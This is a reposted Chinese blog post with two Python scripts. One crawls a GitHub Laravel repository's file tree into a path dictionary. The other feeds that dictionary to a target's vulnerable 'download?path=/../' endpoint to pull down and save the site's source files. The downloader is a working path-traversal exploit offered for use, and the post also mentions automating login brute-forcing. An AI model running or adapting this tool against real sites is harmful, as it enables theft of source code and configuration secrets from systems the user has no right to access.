爬虫：爬取Github项目结构任意文件下载存储

Posted 2021-12-09 南瓜__pumpkin

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了爬虫：爬取Github项目结构任意文件下载存储相关的知识，希望对你有一定的参考价值。

文章目录

场景描述

需求：发现 任意文件下载漏洞 后，可能需要下载源码进行代码审计。

问题：burpsuite 拦截 HTTP/HTTPS 流量，不能使用 Intrude 模块通过文件路径字典来下载文件。

启发：遇到这个问题后，当时是采取手工访问来下载文件。前两天看了 @L4ml3da师傅的内部分享视频讲到了 selenium，19年曾经拿 selenium 写过千行代码，就想到可以通过 selenium 来实现 登录接口爆破 、任意文件下载 等功能的自动化。（至少让我想到了自动化，为以后的偷懒夯实基础）

实践：Python 能实现 登录接口爆破、任意文件下载，其中任意文件下载只要保存返回的数据即可。Python真香，要啥 selenium 模块。

爬取 Github 项目的文件结构

爬取 Laravel 8.x 文件结构

在 Github 上面找了一个 Laravel 8.x 项目，怎么获得其文件结构呢？建议写个爬取脚本，解放双手，成就你的梦想！

编写脚本

参考：

使用 Python 爬虫访问 Github，经常出现连接超时、或读取超时的错误。

访问 Github 连接超时

管理员身份打开记事本，打开文件 C:\\Windows\\System32\\drivers\\etc\\hosts，添加 DNS 解析记录：

192.30.255.112  github.com git 
185.31.16.184 github.global.ssl.fastly.net

requests 读取时间超时

# 设置重连3次
s = requests.session()
s.mount('http://', HTTPAdapter(max_retries=3))
s.mount('https://', HTTPAdapter(max_retries=3))

resp = s.get(url, timeout=(5, 20))	# 20秒是等待服务器响应内容的时间

Github 设置了反爬机制，根据实验推测是一定时间内响应一次，设置随机的 User-Agent 代理没有作用。

打算让 requests 走 proxies 本地代理，手动更换 IP，但没连上代理端口，而且这个只能是缓兵之计。

目前还是耐心等待，爬一次等一分钟。（备注：使用代理连接很通畅）

爬取脚本

Spider_Github_FileStructure.py

# -*- coding: utf-8 -*-

import requests
from requests.adapters import HTTPAdapter
from bs4 import BeautifulSoup

"""避免给注释斜体和加粗"""
"""
@ ToDo:   Crawl the file structure of the GitHub project
@ author: pump
@ date: 2021/11/05
@ 适配性
    问题1，爬取 laravel 5.7
        正常的项目根目录路径是： https://github.com/laravel/laravel/tree/5.7，https://github.com/laravel/laravel/tree/8.x（示例中的是默认页）
        更正：项目根目录地址——修改，前缀和后缀——适配无需修改          
@ 思路：
    访问页面得到的原始数据：一堆超链接。
    筛选原始数据：根据路径。
    处理数据：是目录就下一层。是文件就保存路径。

    第二层，继续调用该方法。需要增加前缀以免重复爬取同一页面，但不能直接增加前缀，否则无法回溯到根目录继续爬取。

@ Github 项目路径信息：
    目录路径：https://github.com/laravel/laravel/tree/8.x/，目录都在/tree目录下
    文件路径：https://github.com/laravel/laravel/blob/8.x/，文件都在/blob/目录下
    补充：目前未确定，是否所有Github项目都以 /tree/ 和 /blob/ 路径来存储文件

@ 算法步骤：
    访问项目根目录页面，把超链接划分成三种：无关类、目录类、文件类
    @@@ 第一层
    （1）无关类：筛选掉
    （2）文件类：写入文件。依据：具有前缀/blob/8.x/
    （3）目录类：多层迭代访问。依据：具有前缀/tree/8.x/

    目录迭代访问算法：
        @@@ 第二层
            例如超链接的相对路径是：/laravel/laravel/tree/8.x/app，此时前缀是/laravel/laravel/tree/8.x/，
    需要对 url 、两个前缀进行更新以下一次调用。此时 url = urlRoot + href
        （1）更新 url：为了求 url ，要从超链接中截取出 "app"，取名后缀tail = href[len(directoryPre):] = "app"
        （2）更新目录前缀：directoryPre + tail
        （3）更新文件前缀：filePre + tail
        @@@ 错误更正1
            错误：不能直接修改前缀的值，这样会导致后续的前缀值无法还原，比如使用前缀/xx/app筛选项目根目录，结果将为空
            更正：传递参数时加上tail，不改变变量值

        @@@ 错误更正2
            错误：保存文件名时，没有添加目录前缀
            更正：定义一个初始前缀变量，把初始前缀变量删除即可

        @@@ 结果保存
            需求：每次启动脚本时，首先清空 .txt 文件内容。
            限制：不能把 write_path() 的文件打开方式改成 w ，因为每次递归都会打开一次
            解决：定义一个清空的函数，启动时写入""来清空

        @@@ 访问情况备注
            使用科学上网软件开启系统代理模式，访问Github几乎无失败记录，非常丝滑
"""

"""
函数说明
    class::__init__(urlRoot, url, dicFilename, directoryPre, filePre) 初始化变量/配置项

    class::write_path(filename, fileList) 把文件路径写入结果文件

    class::write_flush(filename) 清空存放文件路径的结果文件

    class::crawl_github_file_structure(urlRoot, url, dicFilename, directoryPre, filePre) 递归爬取目录、把文件路径写入结果文件

参数说明
    dicFilename = "projectStructure/laravel/laravel_8.x_fileStructure.txt"   变量：存放结果的文件
    urlRoot = "https://github.com"                  常量
    url = "https://github.com/laravel/laravel/"     变量：项目根目录地址
    directoryPre = "/tree/8.x/"                     变量：项目目录存储的路径
    filePre = "/blob/8.x/"                          变量：项目文件存储的路径

class使用说明
    crawl = CrawlGithub(urlRoot, url, dicFilename, directoryPre, filePre)
    
    crawl.write_flush(dicFilename)
    crawl.crawl_github_file_structure(urlRoot, url, dicFilename, directoryPre, filePre)

有效代码量：64 lines
实例结果：见文件末尾
"""


class CrawlGithub:

    def __init__(self, urlRoot, url, dicFilename, directoryPre, filePre):
        self.urlRoot = urlRoot
        self.url = url
        self.dicFilename = dicFilename
        self.directoryPre = directoryPre
        self.filePre = filePre
        self.initDirectoryPre = directoryPre
        self.initFilePre = filePre

    def write_path(self, filename, fileList):
        with open(filename, 'a+') as f:
            for file in fileList:
                f.write(file + "\\n")
            f.close()

    def write_flush(self, filename):
        with open(filename, 'w') as f:
            f.write("")
            f.close()

    def crawl_github_file_structure(self, urlRoot, url, dicFilename, directoryPre, filePre):
        try:
            # 设置重连3次
            s = requests.session()
            s.mount('http://', HTTPAdapter(max_retries=3))
            s.mount('https://', HTTPAdapter(max_retries=3))
            resp = s.get(url, timeout=(5, 20))
            print("访问成功")

            fileList = []
            soup = BeautifulSoup(resp.text, "lxml")
            list_a = soup.find_all('a')
            for a in list_a:
                href = a.get('href')
                print(href)

                # 只做白名单即可：目录路径前缀 /tree/8.x/、文件路径前缀 /blob/8.x/
                if directoryPre in href:    # 目录
                    url = urlRoot + href   # 新的访问页面
                    tail = href[16 + len(directoryPre):]
                    print(url)
                    self.crawl_github_file_structure(urlRoot, url, dicFilename, directoryPre + tail, filePre + tail)

                if filePre in href:
                    href = href[href.find(self.initFilePre) + len(self.initFilePre):]
                    fileList.append(href)
            self.write_path(dicFilename, fileList)

        except requests.exceptions.ConnectTimeout:
             print("网络连接超时")
        except requests.exceptions.ReadTimeout:
            print("读取时间超时")

if __name__ == "__main__":
    dicFilename = "projectStructure/laravel/laravel_5.7_fileStructure.txt"
    urlRoot = "https://github.com"
    url = "https://github.com/laravel/laravel/tree/5.7"
    directoryPre = "/tree/5.7/"
    filePre = "/blob/5.7/"

    crawl = CrawlGithub(urlRoot, url, dicFilename, directoryPre, filePre)

    crawl.write_flush(dicFilename)
    crawl.crawl_github_file_structure(urlRoot, url, dicFilename, directoryPre, filePre)

'''
@@@ 结果示例
app/Console/Kernel.php
app/Exceptions/Handler.php
app/Http/Controllers/Controller.php
app/Http/Middleware/Authenticate.php
app/Http/Middleware/EncryptCookies.php
app/Http/Middleware/PreventRequestsDuringMaintenance.php
app/Http/Middleware/RedirectIfAuthenticated.php
app/Http/Middleware/TrimStrings.php
app/Http/Middleware/TrustHosts.php
app/Http/Middleware/TrustProxies.php
app/Http/Middleware/VerifyCsrfToken.php
app/Http/Kernel.php
app/Models/User.php
app/Providers/AppServiceProvider.php
app/Providers/AuthServiceProvider.php
app/Providers/BroadcastServiceProvider.php
app/Providers/EventServiceProvider.php
app/Providers/RouteServiceProvider.php
bootstrap/cache/.gitignore
bootstrap/app.php
config/app.php
config/auth.php
config/broadcasting.php
config/cache.php
config/cors.php
config/database.php
config/filesystems.php
config/hashing.php
config/logging.php
config/mail.php
config/queue.php
config/sanctum.php
config/services.php
config/session.php
config/view.php
database/factories/UserFactory.php
database/migrations/2014_10_12_000000_create_users_table.php
database/migrations/2014_10_12_100000_create_password_resets_table.php
database/migrations/2019_08_19_000000_create_failed_jobs_table.php
database/migrations/2019_12_14_000001_create_personal_access_tokens_table.php
database/seeders/DatabaseSeeder.php
database/.gitignore
public/.htaccess
public/favicon.ico
public/index.php
public/robots.txt
public/web.config
resources/css/app.css
resources/js/app.js
resources/js/bootstrap.js
resources/lang/en/auth.php
resources/lang/en/pagination.php
resources/lang/en/passwords.php
resources/lang/en/validation.php
resources/views/welcome.blade.php
routes/api.php
routes/channels.php
routes/console.php
routes/web.php
storage/app/public/.gitignore
storage/app/.gitignore
storage/framework/cache/data/.gitignore
storage/framework/cache/.gitignore
storage/framework/sessions/.gitignore
storage/framework/testing/.gitignore
storage/framework/views/.gitignore
storage/framework/.gitignore
storage/logs/.gitignore
tests/Feature/ExampleTest.php
tests/Unit/ExampleTest.php
tests/CreatesApplication.php
tests/TestCase.php
.editorconfig
.env.example
.gitattributes
.gitignore
.styleci.yml
CHANGELOG.md
README.md
artisan
composer.json
package.json
phpunit.xml
server.php
webpack.mix.js
'''

任意文件下载脚本

File_Arbitraty_Download.py

# -*- coding: utf-8 -*-

import requests
from requests.adapters import HTTPAdapter
import os


"""
@ 脚本流程如下，对应三个函数：
        读取字典：逐行读取 projectStructureDicts 目录下的{路径字典文件}，返回一个列表
        访问文件：根据 path 访问站点，根据状态码(200)选择保存文件
        保存文件：保存到 projectFiles 目录下

@ 判断文件是否存在：状态码，示例状态码是200


@调试
    错误: open("", 'w')通过多级目录创建文件失败，例如 [Errno 2] No such file or directory: 'projectFiles/xxx/app/Exceptions/Handler.php'
    原因: open() 无法创建目录
    解决: 使用 os 库 的 os.makedirs() 递归创建目录，其中使用 str.rfind()从末尾查找子串 / ，从而截取目录
    
    错误: 下载的文件内容不对
    解决: 发现是 传参方式，GET 传参才能200，POST 传参会 405 报错
    
@数据保存
    保存文件内容: resp.content
    文件内容格式: resp.content 的格式是 bytes，即 b'xxxxxx'。调用方法 str(b, encoding = "utf8")，直接解决排版问题

@备注: laravel 的 Web 根目录是 app/Http/Controllers/，示例页面 /Student/Title/BookController.php
"""


class FileArbitraryDownload:

    def __init__(self, url, dictName, projectName):

        self.url = url
        self.dictName = 'projectDicts/' + dictName
        self.projectPath = "projectFiles/" + projectName    # 保存文件的文件夹

    def read_dict(self):
        with open(self.dictName, 'r') as f:
            content = f.read()
            path_list = content.split("\\n")
            f.close()
        return path_list

    def download(self):

        # 设置重连3次
        s = requests.session()
        s.mount('http://', HTTPAdapter(max_retries=3))
        s.mount('https://', HTTPAdapter(max_retries=3))

        # proxies = {
        #     "http": "http://127.0.0.1:8080",
        #     "https": "https://127.0.0.1:8080"
        # }
        # 读取字典
        path_list = self.read_dict()
        for path in path_list:
            try:
                print(self.url + path)
                resp = s.get(self.url + path, timeout=5)
                print(self.url + path)
                print(resp.status_code)
                if resp.status_code == 200:
                    self.store_file(path, resp.content)
            except Exception as e:
                print(e)

    def store_file(self, path, file_content):
        file_path = self.projectPath + path
        if not os.path.exists(file_path[:file_path.rfind("/")]):
            os.makedirs(file_path[:file_path.rfind("/")])
        with open(file_path, 'w') as f:
            f.writelines(str(file_content, encoding="utf-8"))
        f.close()


        # write() argument must be str, not bytes


if __name__ == '__main__':
    url = "http://xxx/download?path=/../"
    dictName = "laravel/laravel_5.7_fileStructure.txt"
    projectName = 'xx站点源码/'

    crawlDownload = FileArbitraryDownload(url, dictName, projectName)

    crawlDownload.download()

以上是关于爬虫：爬取Github项目结构任意文件下载存储的主要内容，如果未能解决你的问题，请参考以下文章